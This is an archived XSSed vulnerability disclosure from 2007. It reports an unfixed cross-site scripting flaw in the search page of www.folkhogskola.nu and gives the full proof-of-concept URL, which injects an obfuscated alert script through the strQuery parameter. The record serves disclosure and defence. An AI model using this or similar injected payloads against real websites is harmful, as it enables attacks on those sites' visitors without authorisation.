Unfixed XSS vulnerability at www.folkhogskola.nu

2007-09-17T00:00:00
ID XSSED:17789
Type xssed
Reporter Uber0n
Modified 2007-09-20T00:00:00

Description

Security researcher Uber0n, has submitted on 17/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.folkhogskola.nu, which at the time of submission ranked 1006866 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 20/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.folkhogskola.nu/page/search/TAB/Long/index.html?TAB=Long&TAB2=&Search=1&LONGCATEGORY_ID=0&AREA_ID=0&TIME_ID=&HANDICAP_ID=0&SEASON_ID=0&DISTANCE_ID=0&bitGeneral=&strQuery=%22%3E%3CScRiPt%3Ealert%28String.fromCharCode%2885%2C98%2C101%2C114%2C48%2C110%2C32%2C45%2C32%2C88%2C83%2C83%29%29%3C%2FsCrIpT%3E&submit1=S%F6k+%3E%3E